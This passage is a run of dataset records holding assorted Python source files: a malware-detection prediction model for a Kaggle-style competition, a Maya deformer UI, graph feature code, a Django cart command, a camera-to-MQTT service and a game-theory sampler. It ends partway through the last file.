Luck!')\nprint('--------------------------------------------------------------------------------------------------------')\n\n#Fit OneHotEncoder\nohe = OneHotEncoder(categories='auto', sparse=True, dtype='uint8').fit(train)\n\n#Transform data using small groups to reduce memory usage\nm = 100000\ntrain = vstack([ohe.transform(train[i*m:(i+1)*m]) for i in range(train.shape[0] // m + 1)])\ntest = vstack([ohe.transform(test[i*m:(i+1)*m]) for i in range(test.shape[0] // m + 1)])\nsave_npz('train.npz', train, compressed=True)\nsave_npz('test.npz', test, compressed=True)\n\ndel ohe, train, test\ngc.collect()\n\nskf = StratifiedKFold(n_splits=5, shuffle=True, random_state=42)\nskf.get_n_splits(train_ids, y_train)\n\nlgb_test_result = np.zeros(test_ids.shape[0])\n#lgb_train_result = np.zeros(train_ids.shape[0])\n#xgb_test_result = np.zeros(test_ids.shape[0])\n#xgb_train_result = np.zeros(train_ids.shape[0])\ncounter = 0\n\nprint('\\nLightGBM\\n')\nnn_model = Sequential()\nnn_model.add(Dense(64, input_dim=7739, activation='relu'))\nnn_model.add(Dense(32, activation='relu'))\nnn_model.add(Dense(1, activation='sigmoid'))\nnn_model.compile(loss='mse', optimizer='adam', metrics=['accuracy'])\n\nfor train_index, test_index in skf.split(train_ids, y_train):\n \n print('Fold {}\\n'.format(counter + 1))\n \n train = load_npz('train.npz')\n X_fit = vstack([train[train_index[i*m:(i+1)*m]] for i in range(train_index.shape[0] // m + 1)])\n X_val = vstack([train[test_index[i*m:(i+1)*m]] for i in range(test_index.shape[0] // m + 1)])\n X_fit, X_val = csr_matrix(X_fit, dtype='float32'), csr_matrix(X_val, dtype='float32')\n y_fit, y_val = y_train[train_index], y_train[test_index]\n \n del train\n gc.collect()\n\n # nn_model = MLPRegressor(hidden_layer_sizes=(100,20,))\n # nn_model.fit(X_fit, y_fit)\n\n # print('SHAPE = ', X_fit.shape)\n\n # nn_model = Sequential()\n # nn_model.add(Dense(64, input_dim=X_fit.shape[1], activation='relu'))\n # nn_model.add(Dense(32, 
activation='relu'))\n # nn_model.add(Dense(1, activation='sigmoid'))\n # nn_model.compile(loss='mse', optimizer='adam', metrics=['accuracy'])\n nn_model.fit(X_fit, y_fit, epochs=6, batch_size=32)\n\n # lgb_model = lgb.LGBMClassifier(max_depth=-1,\n # n_estimators=30000,\n # learning_rate=0.05,\n # num_leaves=2**12-1,\n # colsample_bytree=0.28,\n # objective='binary', \n # n_jobs=-1)\n \n #xgb_model = xgb.XGBClassifier(max_depth=6,\n # n_estimators=30000,\n # colsample_bytree=0.2,\n # learning_rate=0.1,\n # objective='binary:logistic', \n # n_jobs=-1)\n \n \n # lgb_model.fit(X_fit, y_fit, eval_metric='auc', \n # eval_set=[(X_val, y_val)], \n # verbose=100, early_stopping_rounds=100)\n \n #xgb_model.fit(X_fit, y_fit, eval_metric='auc', \n # eval_set=[(X_val, y_val)], \n # verbose=1000, early_stopping_rounds=300)\n\n #lgb_train_result[test_index] += lgb_model.predict_proba(X_val)[:,1]\n #xgb_train_result[test_index] += xgb_model.predict_proba(X_val)[:,1]\n \n del X_fit, X_val, y_fit, y_val, train_index, test_index\n gc.collect()\n \n test = load_npz('test.npz')\n test = csr_matrix(test, dtype='float32')\n # lgb_test_result += lgb_model.predict_proba(test)[:,1]\n res = nn_model.predict(test, batch_size=16)[:,0]\n # print('RES SHAPE = ', res.shape)\n lgb_test_result += res\n # exit()\n #xgb_test_result += xgb_model.predict_proba(test)[:,1]\n counter += 1\n \n del test\n gc.collect()\n \n #Stop fitting to prevent time limit error\n #if counter == 3 : break\n\n#print('\\nLigthGBM VAL AUC Score: {}'.format(roc_auc_score(y_train, lgb_train_result)))\n#print('\\nXGBoost VAL AUC Score: {}'.format(roc_auc_score(y_train, xgb_train_result)))\n\nsubmission = pd.read_csv('sample_submission.csv')\nsubmission['HasDetections'] = lgb_test_result / counter\nsubmission.to_csv('lgb_submission_2.csv', index=False)\n#submission['HasDetections'] = xgb_test_result / counter\n#submission.to_csv('xgb_submission.csv', index=False)\n#submission['HasDetections'] = 0.5 * lgb_test_result / counter + 0.5 * xgb_test_result / counter \n##submission.to_csv('lgb_xgb_submission.csv', index=False)\n\nprint('\\nDone.')","repo_name":"CyberDreamer/microsoft_malware","sub_path":"lightgbm-baseline-model-using-sparse-matrix.py","file_name":"lightgbm-baseline-model-using-sparse-matrix.py","file_ext":"py","file_size_in_byte":7982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16793025378","text":"# -*- coding: utf-8 -*-\r\n\r\n# User interface for Poisson MLS Deformer plugin\r\n# The last object in the selected ones will be the target while the others will serve as control points\r\n\r\n# @author Shizuo KAJI\r\n# @date 2016/11/14\r\n\r\n# for debug\r\n#import debugmaya\r\n#debugmaya.startDebug()\r\n\r\n# Import Maya Modules\r\nimport maya.cmds as cmds\r\nimport pymel.core as pm\r\n\r\ndeformerTypes = [\"PoissonMLS\"]\r\n\r\nfor type in deformerTypes:\r\n try:\r\n cmds.loadPlugin(type)\r\n except:\r\n print(\"Plugin %s already loaded\" %(type))\r\n\r\n## prepare interface\r\nclass UI_PoissonMLS:\r\n uiID = \"PoissonMLS\"\r\n title = \"PoissonMLS\"\r\n deformers = []\r\n probes = {}\r\n\r\n ## Constructor\r\n def __init__(self):\r\n if pm.window(self.uiID, exists=True):\r\n pm.deleteUI(self.uiID)\r\n win = pm.window(self.uiID, title=self.title, menuBar=True)\r\n with win:\r\n pm.menu( label='Create', tearOff=True )\r\n for type in deformerTypes:\r\n pm.menuItem( label=type, c=pm.Callback( self.initPlugin, type) )\r\n self._parentLayout = pm.columnLayout( adj=True )\r\n with 
self._parentLayout:\r\n self.createUISet()\r\n\r\n def createUISet(self):\r\n self._childLayout = pm.columnLayout( adj=True )\r\n with self._childLayout:\r\n self.deformers = [pm.ls(type=deformerTypes[i]) for i in range(len(deformerTypes))]\r\n for i in range(len(deformerTypes)):\r\n for node in self.deformers[i]:\r\n self.probes[node] = pm.listConnections(node.cp)\r\n # specific\r\n for node in self.deformers[0]:\r\n frameLayout = pm.frameLayout( label=node.name(), collapsable = True)\r\n with frameLayout:\r\n self.createCommonAttr(node, deformerTypes[0])\r\n indices = cmds.getAttr(node+\".cp\", multiIndices=True)\r\n if indices:\r\n for j in indices:\r\n with pm.rowLayout(numberOfColumns=1) :\r\n pm.attrFieldSliderGrp(label=node.ctlw[j].getAlias(), min=0, max=10.0, attribute=node.ctlw[j])\r\n\r\n # create deformer node and connection\r\n def initPlugin(self, deformerType):\r\n # get transform nodes for the selected objects\r\n transforms = pm.selected(tr=1)\r\n if not transforms:\r\n return\r\n pm.select( transforms[-1]) # the deformer is attached to the last selected object\r\n node = pm.ls(cmds.deformer(type=deformerType)[0])[0]\r\n cmds.makePaintable(deformerType, 'weights', attrType='multiFloat', shapeMode='deformer')\r\n if len(transforms)>1:\r\n self.addProbe(node,deformerType,transforms[:-1])\r\n self.updateUI()\r\n\r\n # add selected transform as a new probe\r\n def addProbe(self,node,deformerType,newProbes):\r\n indexes = cmds.getAttr(node+\".cp\", multiIndices=True)\r\n if not indexes:\r\n n=0\r\n else:\r\n n=indexes[-1]+1\r\n # connect pm first to avoid unnecessary arap computations\r\n for j in range(len(newProbes)):\r\n cmds.connectAttr(newProbes[j]+\".center\", node+\".cp[%s]\" %(j+n))\r\n cmds.connectAttr(newProbes[j]+\".scaleX\", node+\".ctlw[%s]\" %(j+n))\r\n node.icp[j+n].set(node.cp[j+n].get())\r\n\r\n # add selected transform as a new probe\r\n def addSelectedProbe(self,node,deformerType):\r\n newProbes = pm.selected(tr=1)\r\n self.addProbe(node,deformerType,newProbes)\r\n self.updateUI()\r\n\r\n # delete deformer node\r\n def deleteNode(self,node):\r\n cmds.delete(node.name())\r\n self.updateUI()\r\n\r\n # redraw UI\r\n def updateUI(self):\r\n pm.deleteUI( self._childLayout )\r\n pm.setParent(self._parentLayout)\r\n self.createUISet()\r\n\r\n def createCommonAttr(self,node,deformerType):\r\n with pm.rowLayout(numberOfColumns=3) :\r\n pm.button( l=\"Add selection to ctrl points\", c=pm.Callback( self.addSelectedProbe, node, deformerType) )\r\n pm.button( l=\"Delete deformer\", c=pm.Callback( self.deleteNode, node))\r\n pm.attrControlGrp( label=\"Poisson\", attribute= node.poisson)\r\n with pm.rowLayout(numberOfColumns=4) :\r\n pm.attrControlGrp( label=\"MLS mode\", attribute= node.mlsm)\r\n pm.attrControlGrp( label=\"area weight\", attribute= node.aw)\r\n pm.attrControlGrp( label=\"neighbour weighting\", attribute= node.nghbrw)\r\n pm.attrFieldSliderGrp( label=\"iteration\", min=1, max=20, attribute=node.it)\r\n with pm.rowLayout(numberOfColumns=4) :\r\n pm.attrControlGrp( label=\"Weight mode\", attribute= node.wtm)\r\n pm.attrFieldSliderGrp(label=\"effect radius\", min=0.001, max=20.0, attribute=node.er)\r\n pm.attrControlGrp( label=\"normalise weight\", attribute= node.nw)\r\n pm.attrControlGrp( label=\"normExponent\", attribute=node.ne)\r\n with pm.rowLayout(numberOfColumns=4) :\r\n pm.attrControlGrp( label=\"tet mode\", attribute= node.tm)\r\n pm.attrControlGrp( label=\"constraint mode\", attribute= node.ctm)\r\n pm.attrFieldSliderGrp( label=\"constraint weight\", 
min=0.001, max=1000, attribute=node.cw)\r\n pm.attrFieldSliderGrp(label=\"constraint radius\", min=0.001, max=10.0, attribute=node.cr)\r\n\r\n","repo_name":"shizuo-kaji/PoissonMLS","sub_path":"ui_PoissonMLS.py","file_name":"ui_PoissonMLS.py","file_ext":"py","file_size_in_byte":5371,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"1396608628","text":"\"\"\"Role-similarity Based Comparison class.\"\"\"\nfrom functools import lru_cache\n\nimport networkx as nx\nimport numpy as np\nfrom sklearn.preprocessing import normalize\n\nfrom hcga.feature_class import FeatureClass, InterpretabilityScore\nfrom hcga.features.utils import ensure_connected, remove_selfloops\n\nfeatureclass_name = \"RolesimilarityBasedComparison\"\n\n\n@lru_cache(maxsize=None)\ndef rbc(graph):\n \"\"\"Rbc computation.\n\n Features based on the role of a node in a directed network.\n\n Create the role-similarity based comparison (rbc) matrix for nodes in the network,\n then convert this to a graph and extract some features\n ref: https://arxiv.org/abs/1103.5582\n For some features we remove selfloops, since the diagonal of the rbc matrix\n consists of ones, and therefore all nodes will have a selfloop with weight one\n\n References\n ----------\n .. [1] Cooper, Kathryn, and Mauricio Barahona.\n \"Role-based similarity in directed networks.\"\n arXiv preprint arXiv:1012.2726 (2010).\n\n\n \"\"\"\n a = np.where(nx.adj_matrix(graph).toarray() > 0, 1, 0)\n g = nx.DiGraph(a)\n\n if nx.is_directed_acyclic_graph(g):\n k = nx.dag_longest_path_length(g)\n beta = 0.95\n\n else:\n lamb = max(np.linalg.eig(a)[0])\n if lamb != 0:\n beta = 0.95 / lamb\n else:\n beta = 0.95\n k = 10\n\n n = g.number_of_nodes()\n ones = np.ones(n)\n ba = beta * a\n ba_t = np.transpose(ba)\n\n x = np.zeros([n, k * 2])\n for i in range(1, k + 1):\n x[:, i - 1] = np.dot(np.linalg.matrix_power(ba, i), ones)\n x[:, i + k - 1] = np.dot(np.linalg.matrix_power(ba_t, i), ones)\n x_norm = normalize(x, axis=1)\n y = np.matmul(x_norm, np.transpose(x_norm))\n\n return nx.Graph(y)\n\n\ndef number_of_edges(graph):\n \"\"\"\"\"\"\n return rbc(graph).number_of_edges()\n\n\ndef number_of_edges_no_selfloops(graph):\n \"\"\"\"\"\"\n return remove_selfloops(rbc(graph)).number_of_edges()\n\n\ndef connectance(graph):\n \"\"\"\"\"\"\n return nx.density(rbc(graph))\n\n\ndef diameter(graph):\n \"\"\"\"\"\"\n return nx.diameter(rbc(ensure_connected(graph)))\n\n\ndef radius(graph):\n \"\"\"\"\"\"\n return nx.radius(rbc(ensure_connected(graph)))\n\n\ndef degree_assortativity_coeff(graph):\n \"\"\"\"\"\"\n return nx.degree_assortativity_coefficient(rbc(graph))\n\n\ndef graph_clique_number(graph):\n \"\"\"\"\"\"\n return nx.graph_clique_number(rbc(graph))\n\n\ndef num_max_cliques(graph):\n \"\"\"\"\"\"\n return nx.graph_number_of_cliques(rbc(graph))\n\n\ndef transitivity(graph):\n \"\"\"\"\"\"\n return nx.transitivity(rbc(graph))\n\n\ndef is_connected(graph):\n \"\"\"\"\"\"\n return nx.is_connected(rbc(graph)) * 1\n\n\ndef num_connected_components(graph):\n \"\"\"\"\"\"\n return nx.number_connected_components(rbc(graph))\n\n\ndef largest_connected_component(graph):\n \"\"\"\"\"\"\n return rbc(ensure_connected(graph)).number_of_nodes()\n\n\ndef global_efficiency(graph):\n \"\"\"\"\"\"\n return nx.global_efficiency(rbc(graph))\n\n\ndef node_connectivity(graph):\n \"\"\"\"\"\"\n return nx.node_connectivity(rbc(graph))\n\n\ndef edge_connectivity(graph):\n \"\"\"\"\"\"\n return nx.edge_connectivity(rbc(graph))\n\n\nclass 
RolesimilarityBasedComparison(FeatureClass):\n \"\"\"Role-similarity Based Comparison class.\"\"\"\n\n modes = [\"fast\", \"medium\", \"slow\"]\n shortname = \"RBC\"\n name = \"rbc\"\n encoding = \"networkx\"\n\n def compute_features(self):\n # Basic stats\n self.add_feature(\n \"number_of_edges\",\n number_of_edges,\n \"Number of edges in the RBC graph\",\n InterpretabilityScore(5),\n )\n\n self.add_feature(\n \"number_of_edges_no_selfloops\",\n number_of_edges_no_selfloops,\n \"Number of edges, not including selfloops, in the RBC graph\",\n InterpretabilityScore(5),\n )\n\n self.add_feature(\n \"connectance\",\n connectance,\n \"Connectance of the RBC graph\",\n InterpretabilityScore(5),\n )\n\n self.add_feature(\n \"diameter\",\n diameter,\n \"Diameter of the RBC graph\",\n InterpretabilityScore(5),\n )\n\n self.add_feature(\n \"radius\",\n radius,\n \"Radius of the RBC graph\",\n InterpretabilityScore(5),\n )\n\n # Assortativity\n self.add_feature(\n \"degree_assortativity_coeff\",\n degree_assortativity_coeff,\n \"Similarity of connections in the RBC graph with respect to the node degree\",\n InterpretabilityScore(4),\n )\n\n # Cliques\n self.add_feature(\n \"graph_clique_number\",\n graph_clique_number,\n \"The size of the largest clique in the RBC graph\",\n InterpretabilityScore(3),\n )\n\n self.add_feature(\n \"num_max_cliques\",\n num_max_cliques,\n \"The number of maximal cliques in the RBC graph\",\n InterpretabilityScore(3),\n )\n\n # Clustering\n self.add_feature(\n \"transitivity\",\n transitivity,\n \"Transitivity of the graph\",\n InterpretabilityScore(4),\n )\n\n # Components\n self.add_feature(\n \"is_connected\",\n is_connected,\n \"Whether the RBC graph is connected or not\",\n InterpretabilityScore(5),\n )\n\n self.add_feature(\n \"num_connected_components\",\n num_connected_components,\n \"The number of connected components\",\n InterpretabilityScore(5),\n )\n\n self.add_feature(\n \"largest_connected_component\",\n largest_connected_component,\n \"The size of the largest connected component\",\n InterpretabilityScore(4),\n )\n\n # Efficiency\n self.add_feature(\n \"global_efficiency\",\n global_efficiency,\n \"The global efficiency\",\n InterpretabilityScore(4),\n )\n\n # Node connectivity\n self.add_feature(\n \"node_connectivity\",\n node_connectivity,\n \"Node connectivity\",\n InterpretabilityScore(4),\n )\n\n self.add_feature(\n \"edge_connectivity\",\n edge_connectivity,\n \"Edge connectivity\",\n InterpretabilityScore(4),\n )\n","repo_name":"barahona-research-group/hcga","sub_path":"hcga/features/rbc.py","file_name":"rbc.py","file_ext":"py","file_size_in_byte":6491,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"40480312486","text":"# Raise the number x to the power y. 
2^10 = 1024\n\ndef power(x, y):\n if y == 0:\n return 1\n return x * power(x, y-1)\n\n\nif __name__ == '__main__':\n print(power(2, 10))","repo_name":"milssky/python_16plus_recursion","sub_path":"6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41899981508","text":"\"\"\"\n Raspberry Pi Jam GSOC Photo Booth\n\n\"\"\"\nimport base64, os, sys, time\nfrom googleapiclient import discovery\nfrom oauth2client.client import GoogleCredentials\n\ndef GoogleCloudVision(dLandmarks, fp):\n sys.stdout.write(\"--------------------------------------------------------------\\n\")\n sys.stdout.write(\"Start of Google Cloud Vision Process: %s\\n\\n\" % (time.strftime(\"%H:%M:%S\", time.localtime())))\n\n os.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"credentials/googlevisionauthentication.json\"\n credentials = GoogleCredentials.get_application_default()\n service = discovery.build('vision', 'v1', credentials=credentials)\n image_content = base64.b64encode(fp.read())\n service_request = service.images().annotate(body={'requests':[{'image':{'content':image_content.decode('UTF-8')},'features':[{'type':'FACE_DETECTION','maxResults':10}]}]})\n\n dLandmarks = {}\n \n try:\n response = service_request.execute()\n except Exception as e:\n print(\"** COULDN'T CONNECT TO THE GOOGLE CLOUD, TRY AGAIN LATER! ** %s\" % str(e))\n return dLandmarks\n\n try:\n dResponse = response['responses'][0]['faceAnnotations'][0]\n except KeyError as e:\n print(\"** TRY AGAIN - COULDN'T GET A GOOD LOOK AT YOUR EYES!!! ** %s\" % str(e))\n else:\n for i in range(0, len(dResponse['landmarks'])):\n dLandmarks[dResponse['landmarks'][i]['type']] = (dResponse['landmarks'][i]['position']['x'], dResponse['landmarks'][i]['position']['y'])\n del dResponse\n\n del credentials\n del service\n del service_request\n \n sys.stdout.write(\"End of Google Cloud Vision Process: %s\\n\\n\" % (time.strftime(\"%H:%M:%S\", time.localtime())))\n sys.stdout.write(\"--------------------------------------------------------------\\n\")\n\n return dLandmarks\n \n \n","repo_name":"bhontz/photobooth","sub_path":"GoogleCloudVision.py","file_name":"GoogleCloudVision.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30008379272","text":"\"\"\"\nhelpers.house_keeper: module that contains methods that are used here and there for maintenance.\n\n\nhelpers.house_keeper.dist_sq(i, j, df): computes the squared Euclidean distance between the i-th and j-th column vectors of the dataframe\n params:\n i, j: indices of the columns of a matrix\n df: pandas dataframe object\n return: a scalar\n\n\nhelpers.house_keeper.clean(mat): returns the matrix with only the real part of each value\n params: \n mat: a matrix\n return: \n mat: the real-valued matrix\n\n\nhelpers.house_keeper.wrapx(mat): prepends a row that enumerates the columns of the matrix from the first to the last\n params: \n mat: a square matrix\n return: \n mat: a matrix\n\n\nhelpers.house_keeper.wrapy(mat): prepends a column that enumerates the rows of the matrix from the first to the last\n params: \n mat: a square matrix\n return: \n mat: a matrix\n\n\nhelpers.house_keeper.wrap(mat): prepends both an index row and an index column enumerating the matrix from the first to the last\n params: \n mat: a square matrix\n return: \n mat: a matrix\n\"\"\"\n\n\nimport numpy as np\nimport cmath\n\n\ndef dist_sq(i, j, df): # pandas df\n result_vector = df[list(df.columns)[i]] - 
df[list(df.columns)[j]]\n result_vector = result_vector * result_vector\n result = result_vector.sum()\n return result\n\n\ndef clean(mat):\n return mat.real\n\n\ndef wrapx(mat):\n wrapx = [0]\n n = len(mat[0])\n wrapx[0] = np.arange(0, n, 1)\n mat = np.vstack((wrapx, mat))\n return mat\n\n\ndef wrapy(mat):\n mat = np.transpose(mat)\n wrapy = [0]\n n = len(mat)\n wrapy[0] = np.arange(0, n, 1)\n mat = np.vstack((wrapy, mat))\n mat = np.transpose(mat)\n return mat\n\n\ndef wrap(mat):\n mat = wrapy(mat)\n wrap = [0]\n wrap[0] = [i for i in range(len(mat[0]))]\n mat = np.vstack((wrap, mat))\n return mat\n","repo_name":"xfurna/coalapy","sub_path":"coalapy/helpers/house_keeper.py","file_name":"house_keeper.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14597821197","text":"from django.core.management.base import BaseCommand, CommandError\nfrom django.contrib.auth.models import User\n\nclass Command(BaseCommand):\n help = 'Adds the given product to the given user\\'s shopping cart'\n\n def add_arguments(self, parser):\n parser.add_argument('user', type=int)\n parser.add_argument('product', type=int)\n parser.add_argument('quantity', type=int)\n\n def handle(self, *args, **options):\n quantity = options['quantity']\n user_id = options['user']\n product_id = options['product']\n\n try:\n user = User.objects.get(pk=user_id)\n except:\n raise CommandError('User {0} does not exist!'.format(user_id))\n\n try:\n products = user.shopping_cart.add_product(product_id, quantity=quantity)\n except:\n raise CommandError('Product {0} cannot be added to the cart!'.format(product_id))\n\n success_message = 'Added {0} products for a total of {1} in the cart.'.format(quantity, len(products))\n self.stdout.write(self.style.SUCCESS(success_message))\n","repo_name":"alekhinen/everlane","sub_path":"shopping/management/commands/add_to_cart.py","file_name":"add_to_cart.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71428816747","text":"#!/usr/bin/python3\n\nfrom time import sleep\nimport threading\nimport json\nimport paho.mqtt.client as mqtt\n\nimport signal\nimport time\n\nimport io\nfrom PIL import Image\nimport base64\nfrom io import StringIO\nimport cv2\n\n\nclass CoreService(object):\n _kill_now = False\n\n _comm_client = None\n _comm_delay = 0\n _thread_comms = None\n _thread_lock = None\n\n _camera = None\n\n _system_channel = '/system'\n _data_channel = '/camera/macos'\n\n\n def __init__(self):\n signal.signal(signal.SIGINT, self.exit_gracefully)\n signal.signal(signal.SIGTERM, self.exit_gracefully)\n\n def start(self):\n self._comm_client = mqtt.Client(\n client_id=\"service_camera_macos\",\n clean_session=True\n )\n\n self._comm_client.on_message = self._on_message\n self._comm_client.on_connect = self._on_connect\n self._comm_client.on_publish = self._on_publish\n self._comm_client.on_subscribe = self._on_subscribe\n\n self._thread_lock = threading.RLock()\n\n self._thread_comms = threading.Thread(target=self._start_thread_comms)\n self._thread_comms.setDaemon(True)\n self._thread_comms.start()\n\n try:\n pass\n\n except Exception as e:\n self._camera = None\n print(e)\n\n # define a video capture object\n self._camera = cv2.VideoCapture(0)\n\n while True:\n if self._camera:\n print(\"[CAMERA-MACOS] Starting filestream.\")\n\n stream = io.BytesIO()\n image = None\n img_str = None\n buf = 
None\n\n print(\"[CAMERA-MACOS] Taking a photo..\")\n\n try:\n time.sleep(2)\n\n # Capture raw camera image and create a PIL image object\n ret, frame = self._camera.read()\n is_success, buffer = cv2.imencode(\".jpg\", frame)\n stream = io.BytesIO(buffer)\n\n img_str = base64.b64encode(buffer)\n\n except Exception as e:\n print(\"[TURING-CAMERA-MACOS] Had an issue capturing a photo: %s\" % e)\n\n try:\n self.output(img_str, self._data_channel)\n\n except Exception as e:\n print(\"[TURING-CAMERA-MACOS] Couldn't publish to comms\")\n\n else:\n print(\"[CAMERA-MACOS] Skipping taking a photo. Not a supported OS.\")\n\n time.sleep(10)\n\n if self._kill_now:\n # After the loop release the cap object\n self._camera.release()\n # Destroy all the windows\n cv2.destroyAllWindows()\n\n\n # self._camera.close()\n break\n\n def _on_connect(self, client, userdata, flags, rc):\n self.output('{\"sender\": \"service_camera_macos\", \"message\": \"Connected to GrandCentral.\"}')\n\n def _on_message(self, client, userdata, msg):\n msg_struct = None\n\n try:\n msg_struct = json.loads(msg.payload)\n\n except:\n pass\n\n def _on_publish(self, mosq, obj, mid):\n pass\n\n def _on_subscribe(self, mosq, obj, mid, granted_qos):\n self.output('{\"sender\": \"service_camera_macos\", \"message\": \"Successfully subscribed to GrandCentral /system channel.\"}')\n\n def _on_log(self, mosq, obj, level, string):\n pass\n\n def _connect_to_comms(self):\n print('Connecting to comms system..')\n\n try:\n self._comm_client.connect(\n 'localhost',\n 1883,\n 60\n )\n\n except Exception as e:\n print('Could not connect to local GranCentral. Retry in one second.')\n\n time.sleep(1)\n self._connect_to_comms()\n\n def _start_thread_comms(self):\n print('Comms thread started.')\n\n self._thread_lock.acquire()\n\n try:\n self._connect_to_comms()\n\n finally:\n self._thread_lock.release()\n\n print('Connected to comms server.')\n\n while True:\n self._thread_lock.acquire()\n\n try:\n if self._comm_delay > 2000:\n self._comm_client.loop()\n self._comm_delay = 0\n\n else:\n self._comm_delay += 1\n\n finally:\n self._thread_lock.release()\n\n def output(self, msg, channel=_system_channel):\n if self._comm_client:\n self._comm_client.publish(channel, msg)\n\n def stop(self):\n pass\n\n def exit_gracefully(self,signum, frame):\n self._kill_now = True\n","repo_name":"enborra/turing-camera-macos","sub_path":"app/core/core_service.py","file_name":"core_service.py","file_ext":"py","file_size_in_byte":4649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30980370519","text":"def solution(numbers):\n answer = []\n for number in numbers:\n bin_number = get_binary(number)\n i = number+1\n while True:\n if compare_binary(bin_number, get_binary(i)) <= 2:\n answer.append(i)\n break\n i += 1\n return answer\n \ndef get_binary(number):\n bin_number = ''\n while number > 0:\n bin_number = bin_number + str(number%2)\n number = number//2\n return bin_number[::-1]\n\ndef compare_binary(bin1, bin2):\n cnt = 0\n max_len = max(len(bin1), len(bin2))\n bin1 = bin1.rjust(max_len, '0')\n bin2 = bin2.rjust(max_len, '0')\n for i in range(max_len):\n if bin1[i] != bin2[i]:\n cnt += 1\n return cnt\n\nnumbers = [2,7]\nprint(solution(numbers))","repo_name":"sang981113/CodingTest","sub_path":"less_than_2_difference_in_bit.py","file_name":"less_than_2_difference_in_bit.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"72379747307","text":"import copy\nimport functools\nimport itertools\nimport operator\nimport random\n\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport numpy as np\nimport scipy.stats\n\n\nclass ResponseGraphUCB(object):\n \"\"\"ResponseGraphUCB sampler class.\"\"\"\n\n def __init__(self,\n game,\n exploration_strategy='uniform-exhaustive',\n confidence_method='ucb-standard',\n delta=0.01,\n ucb_eps=0,\n per_payoff_confidence=True,\n time_dependent_delta=False):\n \"\"\"Initializes ResponseGraphUCB instance.\n\n Assumes that all payoffs fall in the interval [0,1].\n\n Args:\n game: an instance of the BernoulliGameSampler class.\n exploration_strategy: string specifying the exploration strategy.\n confidence_method: string specifying the confidence method.\n delta: float specifying the UCB delta parameter.\n ucb_eps: float specifying the UCB epsilon parameter.\n per_payoff_confidence: bool specifying whether confidence level applies\n on a per-payoff basis, or to all payoffs simultaneously.\n time_dependent_delta: bool specifying whether the confidence parameter\n varies with the number of interactions so that a union bound holds.\n \"\"\"\n self.exploration_strategy = exploration_strategy\n self.confidence_method = confidence_method\n self.ucb_eps = ucb_eps\n self.G = game # pylint: disable=invalid-name\n self.per_payoff_confidence = per_payoff_confidence\n self.time_dependent_delta = time_dependent_delta\n if self.per_payoff_confidence:\n self._delta = delta\n else:\n self._delta = delta / (\n self.G.n_players *\n functools.reduce(operator.mul, self.G.strategy_spaces, 1))\n\n # Compute the graph\n self.V = list( # pylint: disable=invalid-name\n itertools.product(*[range(smax) for smax in self.G.strategy_spaces]))\n self.E = [] # pylint: disable=invalid-name\n for v in self.V:\n adj_strats = [\n list(range(v[k] + 1, self.G.strategy_spaces[k]))\n for k in range(self.G.n_players)\n ]\n for k in range(self.G.n_players):\n for new_s in adj_strats[k]:\n second_vertex = list(v)\n second_vertex[k] = new_s\n second_vertex = tuple(second_vertex)\n self.E.append((v, second_vertex))\n self.count_history = {v: [] for v in self.V}\n self.total_interactions = 0\n\n def delta(self, k, s):\n \"\"\"Returns the confidence parameter for a given player and profile.\"\"\"\n if not self.time_dependent_delta:\n return self._delta\n else:\n return self._delta * (6 / (np.pi**2 * self.count[k][s] **2))\n\n def initialise_mean_and_count(self):\n \"\"\"Initializes means and counts for all response graph profiles.\"\"\"\n self.mu = [\n np.zeros(tuple(self.G.strategy_spaces)) for _ in range(self.G.n_players)\n ]\n self.count = [\n np.zeros(tuple(self.G.strategy_spaces)) for _ in range(self.G.n_players)\n ]\n\n def update_mean_and_count(self, strat_profile, game_outcome):\n \"\"\"Updates means and counts for strat_profile given game_outcome.\"\"\"\n self.total_interactions += 1\n for k in range(self.G.n_players):\n self.mu[k][strat_profile] *= self.count[k][strat_profile]\n self.mu[k][strat_profile] += game_outcome[k]\n self.count[k][strat_profile] += 1\n self.mu[k][strat_profile] /= self.count[k][strat_profile]\n\n for s in self.V:\n self.count_history[s].append(self.count[0][s] /\n float(self.total_interactions))\n\n def _find_focal_coord(self, s1, s2):\n num_deviations = tuple(s1[l] != s2[l] for l in range(len(s1)))\n assert np.sum(num_deviations) == 1, ('Invalid profile pair s1, s2: ({},{}).'\n 'Exactly one player should'\n 'deviate!'.format(s1, s2))\n return np.argmax(num_deviations)\n\n 
def _initialise_queue_uniform(self):\n self.remaining_edges = copy.deepcopy(self.E)\n\n def _add_to_queue_uniform(self, edges_removed):\n \"\"\"Adds edge to sampling queue using uniform sampling.\"\"\"\n for e in edges_removed:\n self.remaining_edges.remove(e)\n self.profile_queue.append(\n random.choice(random.choice(self.remaining_edges)))\n\n def _initialise_queue_uniform_exhaustive(self):\n self.edge_order = copy.deepcopy(self.E)\n random.shuffle(self.edge_order)\n\n def _add_to_queue_uniform_exhaustive(self, edges_removed):\n \"\"\"Adds edge to sampling queue using uniform-exhausitive sampling.\"\"\"\n for e in edges_removed:\n self.edge_order.remove(e)\n self.profile_queue.append(random.choice(self.edge_order[0]))\n\n def _initialise_queue_valence_weighted(self):\n self.vertex_valences = {\n v: np.sum(self.G.strategy_spaces) - self.G.n_players for v in self.V\n }\n self.sum_valences = sum(self.vertex_valences.values())\n\n def _add_to_queue_valence_weighted(self, edges_removed):\n \"\"\"Adds edge to sampling queue using valence-weighted sampling.\"\"\"\n # Deal with removed edges\n for e in 